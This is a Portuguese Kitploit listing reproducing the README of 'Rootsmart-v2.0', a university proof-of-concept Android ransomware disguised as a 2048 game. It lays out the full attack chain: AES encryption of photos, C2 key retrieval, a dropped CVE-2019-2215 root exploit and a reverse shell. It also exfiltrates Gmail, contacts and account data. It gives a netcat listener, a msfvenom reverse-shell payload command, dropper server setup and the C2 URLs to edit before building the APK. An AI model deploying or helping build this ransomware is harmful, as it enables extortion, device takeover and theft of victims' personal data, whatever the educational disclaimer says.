Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Rootsmart-v2.0 — Desenvolvimento de Ransomware Android - Criptografia AES256 + CVE-2019-2215 (shell root reverso) + Exfiltração de Dados | Kitploit
Ferramentas/GitHubGitHub/crackercat/rootsmart-v2.0
Segurança AndroidFerramentas de Criptografia/DescriptografiaAnálise de VulnerabilidadesExploraçãoEngenharia ReversaExfiltração de DadosTestes de PenetraçãoSegurança MóvelComando e ControleAprendizado e EducaçãoDesenvolvimento de Payloads
27há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
GitHub
crackercat/rootsmart-v2.0

Rootsmart-v2.0

Desenvolvimento de Ransomware Android - Criptografia AES256 + CVE-2019-2215 (shell root reverso) + Exfiltração de Dados

Ver Repositório

Rootsmart 2.0 com cve-2019-2215 + Ransomware

Aviso Legal

Este projeto é exclusivamente para fins educacionais. Este projeto utiliza código de rkshrksh/2048-Game e kangtastic/cve-2019-2215.


Descrição do Projeto

Este projeto faz parte do módulo de Segurança Móvel do Singapore Institute of Technology. O projeto foi realizado em 6 semanas e o objetivo era desenvolver uma aplicação Android maliciosa. Ao fazê-lo, ajudou-nos a aprender como os mecanismos de segurança são implementados num sistema operativo Android e como podemos exercitar o OWASP Mobile Top 10:2017 M8 - Code Tampering.

O projeto é uma prova de conceito para demonstrar um ransomware escrito personalizado que utiliza criptografia AES, armando o cve-2019-2215, e também exfiltra dados do dispositivo infectado.

Foi testado no Android 10 e Google Pixel 2 XL.

root@kitploit:~
├── 2048-Game 					// Android Project Folder
├── 2048-keystore				// Test-Keystore
├── cve-2019-2215				// Modified cve-2019-2215
│	└── cve-2019-2215.c
├── dropper_server				// Dropper server directory 
│	├── cve-2019-2215			// shells.zip content before zipping
│	├── dropper_server.py		// Dropper server program
│	├── exfiltrated_data.log
│	├── masterkeys.txt
│	├── ncat.exe 				// Netcat windows binary - for Reverse shell listener
│	├── requirements.txt
│	├── shells.zip  			// shells.zip that is hosted in root of dropper server
│	└── venv
└── test_images    				// test_images for easy adb push <image.ext> /sdcard/Pictures
Vetor de Ataque:
  1. Instale, execute a aplicação e conceda permissões
  2. O ransomware irá criptografar com AES todos os arquivos em /sdcard/Pictures
  3. Cada arquivo será criptografado com uma chave gerada aleatoriamente
  4. As chaves serão armazenadas em /sdcard/keys.json onde cada par chave:valor é caminho do arquivo:chave
  5. GET HTTP para o servidor C2 /get_mk para recuperar MasterKey e VictimID no corpo da resposta
  6. A MasterKey irá criptografar keys.json, o VictimID será armazenado em /sdcard/victimID.txt
  7. A aplicação irá baixar shells.zip e descompactar o conteúdo
  8. Executa o binário cve-2019-2215 do conteúdo descompactado
  9. Um processo de shell root será gerado e executará install.sh do conteúdo descompactado
  10. Install.sh executará rs.elf do conteúdo descompactado para enviar uma conexão reversa ao servidor de ataque
  11. A aplicação irá exfiltrar o gmail do dispositivo, informações da conta de usuário e contatos.
Demonstração

https://user-images.githubusercontent.com/56181271/155875246-092a3954-2f42-42b7-a00e-581a1bbf0546.mp4


Configuração do C2 (Comando e Controle)

Para este teste, certifique-se de que o telefone da vítima e o servidor C2 estão na mesma sub-rede (caso contrário, hospede o C2 na internet pública). Existem 3 endpoints para o servidor C2 que podem ser encontrados em dropper/dropper_server.py:

  1. /process_command - GET para baixar shells.zip e executar o exploit root cve-2019-2215
  2. /get_mk - GET para obter o par chave-valor victimID:masterkey para criptografar /sdcard/keys.json
  3. /postData - POST para dados exfiltrados de gmail, contatos, informações da conta
Servidor de Reverse Shell
root@kitploit:~
nc -lvnp 1337 # Idealmente, este deve ser o mesmo IP do servidor dropper
Servidor Dropper
root@kitploit:~
# Gere o payload rs.elf
msfvenom -p linux/aarch64/shell_reverse_tcp LHOST=<Attacker IP> LPORT=<Attacker Port> -f elf > rs.elf

# Melhor executar flask no Windows se o WSL não encaminhar o tráfego localhost para o Windows Host
cd dropper
python3 -m venv venv # Crie o venv

# Ative o venv
. venv/bin/activate # Linux
venv\Scripts\activate.bat # Windows
pip install -r requirements.txt --upgrade pip # Certifique-se de que o shell do host seja root/Administrator

# Execute o servidor C2
python3 dropper_server.py # WSL
python dropper_server.py # Windows

shells.zip em /dropper

  1. Vá para a pasta dropper/cve-2019-2215
  2. Após criar o rs.elf, compacte rs.elf + cve-2019-2215, install.sh
  3. Renomeie o arquivo zip para shells.zip
  4. Mova shells.zip para /dropper

Modifique o seguinte antes de compilar o APK

Java Classes

root@kitploit:~
// File : 2048-Game/app/src/main/java/aarkay/a2048game/Temproot.java
// Altere o IP e a porta de acordo com o IP e porta do servidor dropper
String URL = "http://192.168.157.73:8080/process_command"; // Line 19

// File : 2048-Game/app/src/main/java/aarkay/a2048game/Encrypt.java
// Altere o IP e a porta de acordo com o IP e porta do servidor dropper
String URL = "http://192.168.157.73:8080/get_mk"; // Line 45

// File : 2048-Game/app/src/main/java/aarkay/a2048game/PostData.java
// Altere o IP e a porta de acordo com o IP e porta do servidor dropper
String urlString = "http://192.168.157.73:8080/postData"; // Line 32
Baixar ferramenta